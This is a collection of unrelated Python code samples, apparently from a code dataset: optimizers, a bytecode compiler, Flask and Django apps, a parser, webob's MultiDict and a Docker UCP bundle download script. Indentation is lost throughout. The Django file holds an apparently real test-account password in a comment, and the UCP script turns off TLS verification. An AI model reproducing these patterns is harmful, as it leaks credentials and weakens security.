def action(self, iter_num):
for index, layer in enumerate(self.model_params):
self.w_velocities[index] = self.momentum * self.w_velocities[index] + \
self.lr * layer.w_grad
self.b_velocities[index] = self.momentum * self.b_velocities[index] + \
self.lr * layer.b_grad
layer.weights -= self.w_velocities[index]
layer.biases -= self.b_velocities[index]
"""
Adaptive momentum (Adam) optimizer
https://arxiv.org/pdf/1412.6980.pdf
https://habr.com/ru/post/318970/
"""
class Adam(Optimizer):
def __init__(self, params, learning_rate, betas=(0.9, 0.999), eps=1e-8):
super().__init__(params, learning_rate)
self.model_params = params
self.lr = learning_rate
self.betas = betas
self.eps = eps
params_len = len(self.model_params)
self.w_m = {i: np.zeros_like(self.model_params[i].weights) for i in range(params_len)}
self.b_m = {i: np.zeros_like(self.model_params[i].biases) for i in range(params_len)}
self.w_v = copy.deepcopy(self.w_m)
self.b_v = copy.deepcopy(self.b_m)
def action(self, iter_num):
for index, layer in enumerate(self.model_params):
self.w_m[index] = self.betas[0] * self.w_m[index] + (1. - self.betas[0]) * layer.w_grad
self.b_m[index] = self.betas[0] * self.b_m[index] + (1. - self.betas[0]) * layer.b_grad
self.w_v[index] = self.betas[1] * self.w_v[index] + (1. - self.betas[1]) * layer.w_grad ** 2
self.b_v[index] = self.betas[1] * self.b_v[index] + (1. - self.betas[1]) * layer.b_grad ** 2
w_m_hat = self.w_m[index] / (1. - self.betas[0] ** iter_num)
b_m_hat = self.b_m[index] / (1. - self.betas[0] ** iter_num)
w_v_hat = self.w_v[index] / (1. - self.betas[1] ** iter_num)
b_v_hat = self.b_v[index] / (1. - self.betas[1] ** iter_num)
layer.weights -= self.lr * w_m_hat / (np.sqrt(w_v_hat) + self.eps)
layer.biases -= self.lr * b_m_hat / (np.sqrt(b_v_hat) + self.eps)
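
# Hedged usage sketch (not part of the module above): the optimizers expect
# "layer" objects exposing weights/biases plus w_grad/b_grad arrays, so a
# minimal stand-in is enough to exercise a few update steps.
if __name__ == "__main__":
    class _DummyLayer:
        def __init__(self, n_in, n_out):
            self.weights = np.random.randn(n_in, n_out) * 0.01
            self.biases = np.zeros((1, n_out))
            self.w_grad = np.ones_like(self.weights)
            self.b_grad = np.ones_like(self.biases)

    layers = [_DummyLayer(4, 3)]
    optimizer = Adam(layers, learning_rate=1e-3)
    for step in range(1, 4):  # Adam uses the 1-based step count for bias correction
        optimizer.action(step)
    print("mean weight after 3 steps:", layers[0].weights.mean())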
| StarcoderdataPython |
117459 | import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
import numpy as np
def exponential(x, a, b):
return a * b**x
def get_curve_pars(d20, d21):
year = np.linspace(1, 120, num=120)
temp_20 = np.linspace(0, d20*100, num=100)
temp_21 = np.linspace(d20*101, d20*100 + d21*20, num=20)
temp = np.concatenate((temp_20, temp_21), axis=None)
# print(temp)
# plt.plot(year, temp)
(param, cov) = curve_fit(exponential, year, temp, p0=[0.1, 1.05])
# print(param)
perr = np.sqrt(np.diag(cov))
fit = exponential(year, param[0], param[1])
# plt.plot(year, temp, 'r-', year, fit, 'b')
# plt.show()
return [param, perr]
# param, perr = get_curve_pars(0.019, 0.036)
# print(param)
| StarcoderdataPython |
111118 | import ast, collections, dis, types, sys
from functools import reduce
from itertools import chain
from check_subset import check_conformity
def Instruction(opcode, arg):
return bytes([opcode] if arg is None else [opcode, arg % 256, arg // 256])
def concat(assemblies): return b''.join(assemblies)
def SetLineNo(lineno): return b''
def make_lnotab(assembly): return 1, b''
def plumb_depths(assembly): return 10
def assemble(assembly): return assembly
def denotation(opcode):
if opcode < dis.HAVE_ARGUMENT:
return Instruction(opcode, None)
else:
return lambda arg: Instruction(opcode, arg)
op = type('op', (), dict([(name, denotation(opcode))
for name, opcode in dis.opmap.items()]))
def make_table():
table = collections.defaultdict(lambda: len(table))
return table
def collect(table):
return tuple(sorted(table, key=table.get))
def run(filename, module_name):
f = open(filename)
source = f.read()
f.close()
return module_from_ast(module_name, filename, ast.parse(source))
def module_from_ast(module_name, filename, t):
code = code_for_module(module_name, filename, t)
module = types.ModuleType(module_name, ast.get_docstring(t))
exec(code, module.__dict__)
return module
def code_for_module(module_name, filename, t):
return CodeGen(filename, StubScope()).compile_module(t, module_name)
class StubScope: freevars, cellvars, derefvars = (), (), ()
class CodeGen(ast.NodeVisitor):
def __init__(self, filename, scope):
self.filename = filename
self.scope = scope
self.constants = make_table()
self.names = make_table()
self.varnames = make_table()
def compile_module(self, t, name):
assembly = self(t.body) + self.load_const(None) + op.RETURN_VALUE
return self.make_code(assembly, name, 0)
def make_code(self, assembly, name, argcount):
kwonlyargcount = 0
nlocals = len(self.varnames)
stacksize = plumb_depths(assembly)
flags = ( (0x02 if nlocals else 0)
| (0x10 if self.scope.freevars else 0)
| (0x40 if not self.scope.derefvars else 0))
firstlineno, lnotab = make_lnotab(assembly)
return types.CodeType(argcount, kwonlyargcount,
nlocals, stacksize, flags, assemble(assembly),
self.collect_constants(),
collect(self.names), collect(self.varnames),
self.filename, name, firstlineno, lnotab,
self.scope.freevars, self.scope.cellvars)
def __call__(self, t):
if isinstance(t, list): return concat(map(self, t))
assembly = self.visit(t)
return SetLineNo(t.lineno) + assembly if hasattr(t, 'lineno') else assembly
def generic_visit(self, t):
raise NotImplementedError()
def load_const(self, constant):
return op.LOAD_CONST(self.constants[constant, type(constant)])
def collect_constants(self):
return tuple([constant for constant,_ in collect(self.constants)])
def visit_NameConstant(self, t): return self.load_const(t.value) # for None/True/False
def visit_Num(self, t): return self.load_const(t.n)
def visit_Str(self, t): return self.load_const(t.s)
visit_Bytes = visit_Str
def visit_Name(self, t):
if isinstance(t.ctx, ast.Load): return self.load(t.id)
elif isinstance(t.ctx, ast.Store): return self.store(t.id)
else: assert False
def load(self, name): return op.LOAD_NAME(self.names[name])
def store(self, name): return op.STORE_NAME(self.names[name])
def visit_Call(self, t):
assert len(t.args) < 256 and len(t.keywords) < 256
return (self(t.func) + self(t.args) + self(t.keywords)
+ op.CALL_FUNCTION((len(t.keywords) << 8) | len(t.args)))
def visit_keyword(self, t):
return self.load_const(t.arg) + self(t.value)
def visit_Expr(self, t):
return self(t.value) + op.POP_TOP
def visit_Assign(self, t):
def compose(left, right): return op.DUP_TOP + left + right
return self(t.value) + reduce(compose, map(self, t.targets))
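
# Hedged usage sketch: this assembler targets the pre-3.6 bytecode layout
# (opcode plus 16-bit little-endian argument), so the demo below is only
# expected to run on interpreters from that era; wrapping it in a function
# keeps module import side-effect free.
def _demo():
    t = ast.parse("print('hello from generated bytecode')")
    code = code_for_module('demo', '<string>', t)
    exec(code, {})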
if __name__ == '__main__':
sys.argv.pop(0)
run(sys.argv[0], '__main__')
| StarcoderdataPython |
3253586 | from ..base import ShopifyResource
class ProductSearchEngine(ShopifyResource):
pass
| StarcoderdataPython |
8956 | import json
from django.contrib.auth.models import User
from django.http import JsonResponse
from django.shortcuts import redirect, render
from .models import Game2048
# Create your views here.
# test_user
# 8!S#5RP!WVMACg
def game(request):
return render(request, 'game_2048/index.html')
def set_result(request):
user = request.user if str(
request.user) != "AnonymousUser" else User.objects.get(username='test_user')
if request.method == 'POST':
# Get the game state from the POST request
game_state = request.body
obj = Game2048.objects.get(user=user)
        # Check if the game state is identical to the server-side game state
if game_state != obj.game_state:
            # Parse the JSON string into a Python object
json_game_state = json.loads(game_state)
            # Extract the best score from the JSON object
obj.best_score = json_game_state['best']
obj.game_state = json_game_state # save JSON object to game_state
obj.save()
else:
return redirect('game_2048:game')
return JsonResponse("", safe=False)
def get_result(request):
# Check if user is logged in if not set user to test_user
user = request.user if str(
request.user) != "AnonymousUser" else User.objects.get(username='test_user')
if request.method == 'GET':
obj, created = Game2048.objects.get_or_create(user=user)
game_state = obj.game_state
return JsonResponse(game_state, safe=False)
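
# Hedged sketch of the Game2048 model these views assume; field names are
# inferred from the attribute accesses above, not taken from the real models.py.
#
#   class Game2048(models.Model):
#       user = models.OneToOneField(User, on_delete=models.CASCADE)
#       best_score = models.IntegerField(default=0)
#       game_state = models.JSONField(default=dict)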
| StarcoderdataPython |
84778 | <filename>read_ims_legacy.py
def read_ims_legacy(name):
data = {}
dls = []
#should read in .tex file
infile = open(name + ".tex")
instring = infile.read()
##instring = instring.replace(':description',' :citation') ## to be deprecated soon
instring = unicode(instring,'utf-8')
meta = {}
metatxt = instring.split('::')[1]
meta['record_txt'] = '::' + metatxt.strip() + '\n\n'
meta['bibtype'],rest= metatxt.split(None,1)
meta['id'],rest= rest.split(None,1)
rest = '\n' + rest.strip()
secs = rest.split('\n:')[1:]
for sec in secs:
k,v = sec.split(None,1)
meta[k] = v
data['metadata'] = meta
for x in instring.split('::person')[1:]:
x = x.split('\n::')[0]
d = {}
d['record_txt'] = '::person ' + x.strip() + '\n'
lines = d['record_txt'].split('\n')
lines = [line for line in lines if not line.find('Email') >= 0 ]
pubrecord = '\n'.join(lines) + '\n'
d['public_record_txt'] = break_txt(pubrecord,80)
secs = x.split('\n:')
toplines = secs[0].strip()
d['id'], toplines = toplines.split(None,1)
try: name,toplines = toplines.split('\n',1)
except:
name = toplines
toplines = ''
d['complete_name'] = name
#d['link_lines'] = toplines
d['link_ls'] = lines2link_ls(toplines)
for sec in secs[1:]:
words = sec.split()
key = words[0]
if len(words) > 1:
val = sec.split(None,1)[1] ## keep newlines
else: val = ''
if d.has_key(key): d[key] += [val]
else: d[key] = [val]
d['Honor'] = [ read_honor(x) for x in d.get('Honor',[]) ]
d['Degree'] = [ read_degree(x) for x in d.get('Degree',[]) ]
d['Education'] = [ read_education(x) for x in d.get('Education',[]) ]
d['Service'] = [ read_service(x) for x in d.get('Service',[]) ]
d['Position'] = [ read_position(x) for x in d.get('Position',[]) ]
d['Member'] = [ read_member(x) for x in d.get('Member',[]) ]
d['Image'] = [ read_image(x) for x in d.get('Image',[]) ]
d['Homepage'] = [ read_homepage(x) for x in d.get('Homepage',[]) ]
for k in bio_cat_order:
#d['Biography'] = [ read_bio(x) for x in d.get('Biography',[]) ]
d[k] = [ read_bio(x) for x in d.get(k,[]) ]
dls += [d]
links_txt = instring.split('::links',1)[1].split('\n::')[0]
data['link_ls'] = links_txt2ls(links_txt)
data['records'] = dls
books = instring.split('::book')[1:]
book_dict = {}
for b in books:
b = 'book' + b
d = read_book(b)
del d['top_line']
book_dict[ d['id'] ] = d
data['books'] = book_dict
links_txt = instring.split('::links',1)[1].split('\n::')[0]
data['link_ls'] = links_txt2ls(links_txt)
return data | StarcoderdataPython |
80097 | import flask
app = flask.Flask(__name__)
from werkzeug.contrib.fixers import ProxyFix
app.wsgi_app = ProxyFix(app.wsgi_app)
from flask.ext.babel import Babel
babel = Babel(app)
from flask import render_template
from flask.ext.babel import gettext as _, ngettext
@babel.localeselector
def get_locale():
return 'fr'
@app.route("/")
def index():
brittany = _('Brittany')
france = _('France')
return render_template('index.html',
some_text=_("I am a sausage."),
best_part=_("%(part)s is the best part of %(country)s.", part=brittany, country=france),
singular=ngettext('I bought a garlic glove this morning.', 'I bought %(num)d garlic gloves this morning.', 1),
plural=ngettext('I bought a garlic glove this morning.', 'I bought %(num)d garlic gloves this morning.', 42))
if __name__ == "__main__":
app.run(host="0.0.0.0")
| StarcoderdataPython |
3221895 | <reponame>unstad/jarvis2<filename>jarvis/app.py
# -*- coding: utf-8 -*-
import json
import logging
import os
try:
import queue
except ImportError:
import Queue as queue
try:
import socketserver
except ImportError:
import SocketServer as socketserver
from apscheduler.schedulers.background import BackgroundScheduler
from datetime import datetime, timedelta
from flask import Flask, render_template, Response, request, abort, jsonify
from flask_assets import Environment, Bundle
from flask.templating import TemplateNotFound
from jobs import load_jobs
from random import randint
app = Flask(__name__)
app.logger.setLevel(logging.INFO)
app.jinja_env.trim_blocks = True
app.jinja_env.lstrip_blocks = True
sched = BackgroundScheduler(logger=app.logger)
queues = {}
last_events = {}
@app.before_first_request
def _configure_bundles():
js = ["main.js"]
css = ["main.css"]
widgets_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), "static", "widgets")
)
for widget in os.listdir(widgets_path):
widget_path = os.path.join("widgets", widget)
for asset_file in os.listdir(os.path.join(widgets_path, widget)):
asset_path = os.path.join(widget_path, asset_file)
if asset_file.endswith(".js"):
js.append(asset_path)
elif asset_file.endswith(".css"):
css.append(asset_path)
assets = Environment(app)
if app.debug:
assets.register("js_all", Bundle(*js, output="gen/app.js"))
assets.register("css_all", Bundle(*css, output="gen/styles.css"))
else:
assets.register(
"js_min_all", Bundle(*js, filters="rjsmin", output="gen/app.min.js")
)
assets.register(
"css_min_all", Bundle(*css, filters="cssmin", output="gen/styles.min.css")
)
@app.route("/w/<job_id>")
@app.route("/widget/<job_id>")
def widget(job_id):
if not _is_enabled(job_id):
abort(404)
x = request.args.get("x", 3)
widgets = _enabled_jobs()
# Use the widget matching the job implementation, or an explicitly declared
# widget
job = _config()["JOBS"][job_id]
widget = job.get("job_impl", job_id)
widget = job.get("widget", widget)
return render_template(
"index.html",
layout="layout_single.html",
widget=widget,
job=job_id,
x=x,
widgets=widgets,
)
@app.route("/")
@app.route("/d/<layout>")
@app.route("/dashboard/<layout>")
def dashboard(layout=None):
locale = request.args.get("locale")
widgets = _enabled_jobs()
layout = layout or _config().get("DEFAULT_LAYOUT")
if layout is None:
return render_template("index.html", locale=locale, widgets=widgets)
try:
return render_template(
"index.html",
layout="layouts/{0}.html".format(layout),
locale=locale,
widgets=widgets,
)
except TemplateNotFound:
abort(404)
@app.route("/widgets")
def widgets():
return jsonify(_enabled_jobs())
@app.route("/events")
def events():
remote_port = request.environ["REMOTE_PORT"]
current_queue = queue.Queue()
queues[remote_port] = current_queue
for event in last_events.values():
current_queue.put(event)
def consume():
while True:
data = current_queue.get()
if data is None:
break
yield "data: %s\n\n" % (data,)
response = Response(consume(), mimetype="text/event-stream")
response.headers["X-Accel-Buffering"] = "no"
return response
@app.route("/events/<job_id>", methods=["POST"])
def create_event(job_id):
if not _is_enabled(job_id):
abort(404)
body = request.get_json()
if not body:
abort(400)
_add_event(job_id, body)
return "", 201
def _config():
if app.testing: # tests set their own config
return app.config
app.config.from_envvar("JARVIS_SETTINGS")
return app.config
def _enabled_jobs():
config = _config()["JOBS"]
return [job_id for job_id in config.keys() if config[job_id].get("enabled")]
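
# Hedged example of the settings module that JARVIS_SETTINGS points at; the job
# names and options below are illustrative, not taken from the project docs.
#
#   DEFAULT_LAYOUT = "4x2"
#   JOBS = {
#       "clock": {"enabled": True, "interval": 60},
#       "office_weather": {"enabled": True, "job_impl": "weather", "interval": 600},
#   }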
def _is_enabled(job_id):
return job_id in _enabled_jobs()
@app.context_processor
def _inject_template_methods():
return dict(is_job_enabled=_is_enabled)
@app.after_request
def _set_security_headers(response):
csp = (
"default-src 'none'; "
"connect-src 'self'; "
"img-src 'self' https://i.scdn.co; "
"script-src 'self' https://cdnjs.cloudflare.com; "
"style-src 'self' https://cdnjs.cloudflare.com https://fonts.googleapis.com; "
"font-src https://fonts.gstatic.com"
)
response.headers["Content-Security-Policy"] = csp
response.headers["X-Content-Type-Options"] = "nosniff"
response.headers["X-Frame-Options"] = "DENY"
response.headers["X-XSS-Protection"] = "1; mode=block"
return response
@app.before_first_request
def _schedule_jobs():
offset = 0
jobs = load_jobs()
for job_id, job_config in _config()["JOBS"].items():
job_impl = job_config.get("job_impl", job_id)
if not job_config.get("enabled"):
app.logger.info("Skipping disabled job: %s", job_id)
continue
if job_impl not in jobs:
app.logger.info(
("Skipping job with ID %s (no such " "implementation: %s)"),
job_id,
job_impl,
)
continue
job = jobs[job_impl](job_config)
if app.debug:
start_date = datetime.now() + timedelta(seconds=1)
else:
offset += randint(4, 10)
start_date = datetime.now() + timedelta(seconds=offset)
job.start_date = start_date
app.logger.info(
"Scheduling job with ID %s (implementation: %s): %s", job_id, job_impl, job
)
sched.add_job(
_run_job,
"interval",
name=job_id,
next_run_time=job.start_date,
coalesce=True,
seconds=job.interval,
kwargs={"job_id": job_id, "job": job},
)
if not sched.running:
sched.start()
def _add_event(job_id, data):
json_data = json.dumps(
{"body": data, "job": job_id}, separators=(",", ":"), sort_keys=True
)
last_events[job_id] = json_data
for q in queues.values():
q.put(json_data)
def _run_job(job_id, job):
try:
data = job.get()
_add_event(job_id, data)
except Exception as e:
app.logger.warning("Failed to execute job: " + job_id + ": " + str(e))
def _close_stream(*args, **kwargs):
remote_port = args[2][1]
if remote_port in queues:
del queues[remote_port]
socketserver.BaseServer.handle_error = _close_stream
| StarcoderdataPython |
92562 |
import sys, json, requests, wget
#import urllib2 import urlopen, URLError, HTTPError
def clientbundle():
pass
url="https://ec2-54-183-194-88.us-west-1.compute.amazonaws.com/auth/login"
data = dict(username='docker', password='<PASSWORD>')
r = requests.post(url, json=data, verify=False)
auth_token = json.loads(r.content)["auth_token"]
headers = { 'Authorization': 'Bearer + ' + auth_token }
ucp_api = "https://ec2-54-183-194-88.us-west-1.compute.amazonaws.com/api/clientbundle"
target_path = 'bundle.zip'
handle = open(target_path, "wb")
response = requests.get(ucp_api, headers=headers, stream=True, verify=False)
for chunk in response.iter_content(chunk_size=512):
if chunk: # filter out keep-alive new chunks
handle.write(chunk)
handle.close()
#wget.download(url)
| StarcoderdataPython |
3228021 | <reponame>Valmarelox/auto_struct
from struct import Struct
from typing import Optional, Sequence, Any
from auto_struct.exceptions.type import ElementCountException
def create_struct(fmt: str) -> Struct:
return Struct('=' + fmt.replace('=', ''))
class BaseTypeMeta(type):
FORMAT = None
@property
def struct(cls) -> Optional[Struct]:
if cls.FORMAT:
return create_struct(cls.FORMAT)
return None
def __len__(self) -> int:
return self.struct.size
class BaseType(metaclass=BaseTypeMeta):
"""
    Base type that the rest of the module inherits from; allows automatic packing and unpacking of datatypes.
"""
@classmethod
def parse(cls, data: bytes):
if len(cls) != len(data):
raise ElementCountException(f'{cls.__name__} received {len(data)} elements, expected: {len(cls)}')
return cls(*cls.struct.unpack(data))
@classmethod
def element_count(cls) -> int:
return 1
@classmethod
def _rec_element_count(cls):
return cls.element_count()
@classmethod
def build_tuple_tree(cls, values) -> Sequence[Any]:
if len(values) != 1:
raise ElementCountException(f'{cls.__name__} received {len(values)} elements, expected: 1')
return values
def __hash__(self):
return hash(self._rec_element_count()) + hash(type(self))
@property
def struct(self):
return type(self).struct
def __len__(self):
return len(type(self))
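
# Hedged usage sketch: a concrete subclass only needs to declare FORMAT; parse()
# then unpacks raw bytes into an instance via the constructor. The example value
# below assumes a little-endian machine, since '=' keeps native byte order.
class UInt32(BaseType):
    FORMAT = 'I'

    def __init__(self, value):
        self.value = value

# UInt32.parse(b'\x01\x00\x00\x00').value == 1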
| StarcoderdataPython |
1603763 | <gh_stars>1-10
import os
from random import shuffle
from utils.file_functions import get_subfolder_names
from archive.loader_archive.XSensRecordingReader import XSensRecordingReader
import pandas as pd
import utils.settings as settings
from utils.Recording import Recording
def load_dataset(dataset_path: str) -> "list[Recording]":
"""
    Returns a list of the raw recordings (activities and subjects included, None values kept) - a different representation of the dataset.
    Note: the order follows the directory structure (not shuffled).
This function knows the structure of the XSens dataset.
It will call the create_recording_frame function on every recording folder.
bp/data
dataset_01
activity_01
subject_01
recording_01
random_bullshit_folder
sensor_01.csv
sensor_02.csv
...
recording_02
...
subject_02
....
activity_02
...
data_set_02
...
"""
if not os.path.exists(dataset_path):
raise Exception("The dataset_path does not exist")
recordings: list[Recording] = []
# activity
activity_folder_names = get_subfolder_names(dataset_path)
for activity_folder_name in activity_folder_names:
activity_folder_path = os.path.join(dataset_path, activity_folder_name)
# subject
subject_folder_names = get_subfolder_names(activity_folder_path)
for subject_folder_name in subject_folder_names:
subject_folder_path = os.path.join(
activity_folder_path, subject_folder_name
)
# recording
recording_folder_names = get_subfolder_names(subject_folder_path)
for recording_folder_name in recording_folder_names:
if recording_folder_name.startswith("_"):
continue
recording_folder_path = os.path.join(
subject_folder_path, recording_folder_name
)
# print("Reading recording: {}".format(recording_folder_path))
recordings.append(
create_recording(
recording_folder_path, activity_folder_name, subject_folder_name
)
)
return recordings
def create_recording(
recording_folder_path: str, activity: str, subject: str
) -> Recording:
"""
Returns a recording
Gets a XSens recorind folder path, loops over sensor files, concatenates them, adds activity and subject, returns a recording
"""
raw_recording_frame = XSensRecordingReader.get_recording_frame(
recording_folder_path
)
time_column_name = "SampleTimeFine"
time_frame = raw_recording_frame[time_column_name]
sensor_frame = raw_recording_frame.drop([time_column_name], axis=1)
sensor_frame = reorder_sensor_columns(sensor_frame)
return Recording(sensor_frame, time_frame, activity, subject)
def reorder_sensor_columns(sensor_frame: pd.DataFrame) -> pd.DataFrame:
"""
reorders according to global settings
"""
column_suffix_dict = {}
for column_name in sensor_frame.columns:
ending = column_name[-2:]
if ending in column_suffix_dict:
column_suffix_dict[ending].append(column_name)
else:
column_suffix_dict[ending] = [column_name]
# assert list(column_suffix_dict.keys()) == settings.DATA_CONFIG.sensor_suffix_order ... only same elements
column_names_ordered = []
for sensor_suffix in settings.DATA_CONFIG.sensor_suffix_order:
column_names_ordered.extend(column_suffix_dict[sensor_suffix])
return sensor_frame[column_names_ordered]
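
# Hedged usage sketch (the path is illustrative, and settings.DATA_CONFIG must be
# initialised elsewhere before sensor columns can be reordered):
#   recordings = load_dataset("bp/data/dataset_01")
#   print(len(recordings), recordings[0].activity, recordings[0].subject)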
| StarcoderdataPython |
74713 | from django.test import TestCase
from django_hats.bootstrap import Bootstrapper
class RolesTestCase(TestCase):
def setUp(self, *args, **kwargs):
'''Clears `Roles` cache for testing.
'''
for role in Bootstrapper.get_roles():
setattr(role, 'group', None)
return super(RolesTestCase, self).setUp(*args, **kwargs)
| StarcoderdataPython |
3303136 | <reponame>MiCHiLU/google_appengine_sdk
# (c) 2005 <NAME> and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
"""
Gives a multi-value dictionary object (MultiDict) plus several wrappers
"""
import cgi
import copy
import sys
from webob.util.dictmixin import DictMixin
try:
reversed
except NameError:
from webob.util.reversed import reversed
__all__ = ['MultiDict', 'UnicodeMultiDict', 'NestedMultiDict', 'NoVars']
class MultiDict(DictMixin):
"""
An ordered dictionary that can have multiple values for each key.
Adds the methods getall, getone, mixed, and add to the normal
dictionary interface.
"""
def __init__(self, *args, **kw):
if len(args) > 1:
raise TypeError(
"MultiDict can only be called with one positional argument")
if args:
if hasattr(args[0], 'iteritems'):
items = list(args[0].iteritems())
elif hasattr(args[0], 'items'):
items = args[0].items()
else:
items = list(args[0])
self._items = items
else:
self._items = []
self._items.extend(kw.iteritems())
#@classmethod
def view_list(cls, lst):
"""
Create a dict that is a view on the given list
"""
if not isinstance(lst, list):
raise TypeError(
"%s.view_list(obj) takes only actual list objects, not %r"
% (cls.__name__, lst))
obj = cls()
obj._items = lst
return obj
view_list = classmethod(view_list)
#@classmethod
def from_fieldstorage(cls, fs):
"""
Create a dict from a cgi.FieldStorage instance
"""
obj = cls()
if fs.list:
# fs.list can be None when there's nothing to parse
for field in fs.list:
if field.filename:
obj.add(field.name, field)
else:
obj.add(field.name, field.value)
return obj
from_fieldstorage = classmethod(from_fieldstorage)
def __getitem__(self, key):
for k, v in reversed(self._items):
if k == key:
return v
raise KeyError(key)
def __setitem__(self, key, value):
try:
del self[key]
except KeyError:
pass
self._items.append((key, value))
def add(self, key, value):
"""
Add the key and value, not overwriting any previous value.
"""
self._items.append((key, value))
def getall(self, key):
"""
Return a list of all values matching the key (may be an empty list)
"""
result = []
for k, v in self._items:
if key == k:
result.append(v)
return result
def getone(self, key):
"""
Get one value matching the key, raising a KeyError if multiple
values were found.
"""
v = self.getall(key)
if not v:
raise KeyError('Key not found: %r' % key)
if len(v) > 1:
raise KeyError('Multiple values match %r: %r' % (key, v))
return v[0]
def mixed(self):
"""
Returns a dictionary where the values are either single
values, or a list of values when a key/value appears more than
once in this dictionary. This is similar to the kind of
dictionary often used to represent the variables in a web
request.
"""
result = {}
multi = {}
for key, value in self.iteritems():
if key in result:
# We do this to not clobber any lists that are
# *actual* values in this dictionary:
if key in multi:
result[key].append(value)
else:
result[key] = [result[key], value]
multi[key] = None
else:
result[key] = value
return result
def dict_of_lists(self):
"""
Returns a dictionary where each key is associated with a
list of values.
"""
result = {}
for key, value in self.iteritems():
if key in result:
result[key].append(value)
else:
result[key] = [value]
return result
def __delitem__(self, key):
items = self._items
found = False
for i in range(len(items)-1, -1, -1):
if items[i][0] == key:
del items[i]
found = True
if not found:
raise KeyError(key)
def __contains__(self, key):
for k, v in self._items:
if k == key:
return True
return False
has_key = __contains__
def clear(self):
self._items = []
def copy(self):
return self.__class__(self)
def setdefault(self, key, default=None):
for k, v in self._items:
if key == k:
return v
self._items.append((key, default))
return default
def pop(self, key, *args):
if len(args) > 1:
raise TypeError, "pop expected at most 2 arguments, got "\
+ repr(1 + len(args))
for i in range(len(self._items)):
if self._items[i][0] == key:
v = self._items[i][1]
del self._items[i]
return v
if args:
return args[0]
else:
raise KeyError(key)
def popitem(self):
return self._items.pop()
def update(self, other=None, **kwargs):
if other is None:
pass
elif hasattr(other, 'items'):
self._items.extend(other.items())
elif hasattr(other, 'keys'):
for k in other.keys():
self._items.append((k, other[k]))
else:
for k, v in other:
self._items.append((k, v))
if kwargs:
self.update(kwargs)
def __repr__(self):
items = ', '.join(['(%r, %r)' % v for v in self.iteritems()])
return '%s([%s])' % (self.__class__.__name__, items)
def __len__(self):
return len(self._items)
##
## All the iteration:
##
def keys(self):
return [k for k, v in self._items]
def iterkeys(self):
for k, v in self._items:
yield k
__iter__ = iterkeys
def items(self):
return self._items[:]
def iteritems(self):
return iter(self._items)
def values(self):
return [v for k, v in self._items]
def itervalues(self):
for k, v in self._items:
yield v
class UnicodeMultiDict(DictMixin):
"""
A MultiDict wrapper that decodes returned values to unicode on the
fly. Decoding is not applied to assigned values.
The key/value contents are assumed to be ``str``/``strs`` or
``str``/``FieldStorages`` (as is returned by the ``paste.request.parse_``
functions).
Can optionally also decode keys when the ``decode_keys`` argument is
True.
``FieldStorage`` instances are cloned, and the clone's ``filename``
variable is decoded. Its ``name`` variable is decoded when ``decode_keys``
is enabled.
"""
def __init__(self, multi=None, encoding=None, errors='strict',
decode_keys=False):
self.multi = multi
if encoding is None:
encoding = sys.getdefaultencoding()
self.encoding = encoding
self.errors = errors
self.decode_keys = decode_keys
def _decode_key(self, key):
if self.decode_keys:
try:
key = key.decode(self.encoding, self.errors)
except AttributeError:
pass
return key
def _decode_value(self, value):
"""
        Decode the specified value to unicode. Assumes value is a ``str`` or
        ``FieldStorage`` object.
``FieldStorage`` objects are specially handled.
"""
if isinstance(value, cgi.FieldStorage):
# decode FieldStorage's field name and filename
value = copy.copy(value)
if self.decode_keys:
value.name = value.name.decode(self.encoding, self.errors)
if value.filename:
value.filename = value.filename.decode(self.encoding,
self.errors)
else:
try:
value = value.decode(self.encoding, self.errors)
except AttributeError:
pass
return value
def __getitem__(self, key):
return self._decode_value(self.multi.__getitem__(key))
def __setitem__(self, key, value):
self.multi.__setitem__(key, value)
def add(self, key, value):
"""
Add the key and value, not overwriting any previous value.
"""
self.multi.add(key, value)
def getall(self, key):
"""
Return a list of all values matching the key (may be an empty list)
"""
return [self._decode_value(v) for v in self.multi.getall(key)]
def getone(self, key):
"""
Get one value matching the key, raising a KeyError if multiple
values were found.
"""
return self._decode_value(self.multi.getone(key))
def mixed(self):
"""
Returns a dictionary where the values are either single
values, or a list of values when a key/value appears more than
once in this dictionary. This is similar to the kind of
dictionary often used to represent the variables in a web
request.
"""
unicode_mixed = {}
for key, value in self.multi.mixed().iteritems():
if isinstance(value, list):
value = [self._decode_value(value) for value in value]
else:
value = self._decode_value(value)
unicode_mixed[self._decode_key(key)] = value
return unicode_mixed
def dict_of_lists(self):
"""
Returns a dictionary where each key is associated with a
list of values.
"""
unicode_dict = {}
for key, value in self.multi.dict_of_lists().iteritems():
value = [self._decode_value(value) for value in value]
unicode_dict[self._decode_key(key)] = value
return unicode_dict
def __delitem__(self, key):
self.multi.__delitem__(key)
def __contains__(self, key):
return self.multi.__contains__(key)
has_key = __contains__
def clear(self):
self.multi.clear()
def copy(self):
return UnicodeMultiDict(self.multi.copy(), self.encoding, self.errors)
def setdefault(self, key, default=None):
return self._decode_value(self.multi.setdefault(key, default))
def pop(self, key, *args):
return self._decode_value(self.multi.pop(key, *args))
def popitem(self):
k, v = self.multi.popitem()
return (self._decode_key(k), self._decode_value(v))
def __repr__(self):
items = ', '.join(['(%r, %r)' % v for v in self.items()])
return '%s([%s])' % (self.__class__.__name__, items)
def __len__(self):
return self.multi.__len__()
##
## All the iteration:
##
def keys(self):
return [self._decode_key(k) for k in self.multi.iterkeys()]
def iterkeys(self):
for k in self.multi.iterkeys():
yield self._decode_key(k)
__iter__ = iterkeys
def items(self):
return [(self._decode_key(k), self._decode_value(v)) for \
k, v in self.multi.iteritems()]
def iteritems(self):
for k, v in self.multi.iteritems():
yield (self._decode_key(k), self._decode_value(v))
def values(self):
return [self._decode_value(v) for v in self.multi.itervalues()]
def itervalues(self):
for v in self.multi.itervalues():
yield self._decode_value(v)
_dummy = object()
class NestedMultiDict(MultiDict):
"""
Wraps several MultiDict objects, treating it as one large MultiDict
"""
def __init__(self, *dicts):
self.dicts = dicts
def __getitem__(self, key):
for d in self.dicts:
value = d.get(key, _dummy)
if value is not _dummy:
return value
raise KeyError(key)
def _readonly(self, *args, **kw):
raise KeyError("NestedMultiDict objects are read-only")
__setitem__ = _readonly
add = _readonly
__delitem__ = _readonly
clear = _readonly
setdefault = _readonly
pop = _readonly
popitem = _readonly
update = _readonly
def getall(self, key):
result = []
for d in self.dicts:
result.extend(d.getall(key))
return result
# Inherited:
# getone
# mixed
# dict_of_lists
# copy
def __contains__(self, key):
for d in self.dicts:
if key in d:
return True
return False
has_key = __contains__
def __len__(self):
v = 0
for d in self.dicts:
